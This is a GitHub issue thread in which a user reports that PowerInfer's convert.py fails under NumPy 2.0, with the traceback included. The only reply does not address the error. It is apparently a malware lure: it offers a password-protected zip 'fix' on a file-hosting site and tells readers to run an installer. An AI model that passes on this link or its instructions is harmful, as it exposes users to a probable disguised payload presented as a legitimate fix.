### ISSUE TITLE
Am i doing something wrong?

### ISSUE THREAD

**Issue by RealMrCactus** [SJTU-IPADS/PowerInfer#216]
# Prerequisites

Before submitting your question, please ensure the following:

- [x] I am running the latest version of PowerInfer. Development is rapid, and as of now, there are no tagged versions.
- [x] I have carefully read and followed the instructions in the [README.md](https://github.com/SJTU-IPADS/PowerInfer/blob/main/README.md).
- [x] I [searched using keywords relevant to my issue](https://docs.github.com/en/issues/tracking-your-work-with-issues/filtering-and-searching-issues-and-pull-requests) to make sure that I am creating a new issue that is not already open (or closed).

# Question Details

```py
~/tenv/PowerInfer# python convert.py --outfile ./ReluLLaMA-70B-PowerInfer-GGUF/llama-70b-relu.powerinfer.gguf ./SparseLLM/ReluLLaMA-70B ./PowerInfer/ReluLLaMA-70B-Predictor
Traceback (most recent call last):
  File "/root/tenv/PowerInfer/convert.py", line 1308, in <module>
    main()
  File "/root/tenv/PowerInfer/convert.py", line 1193, in main
    if np.uint32(1) == np.uint32(1).newbyteorder("<"):
                       ^^^^^^^^^^^^^^^^^^^^^^^^^
AttributeError: `newbyteorder` was removed from scalar types in NumPy 2.0. Use `sc.view(sc.dtype.newbyteorder(order))` instead.
```

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
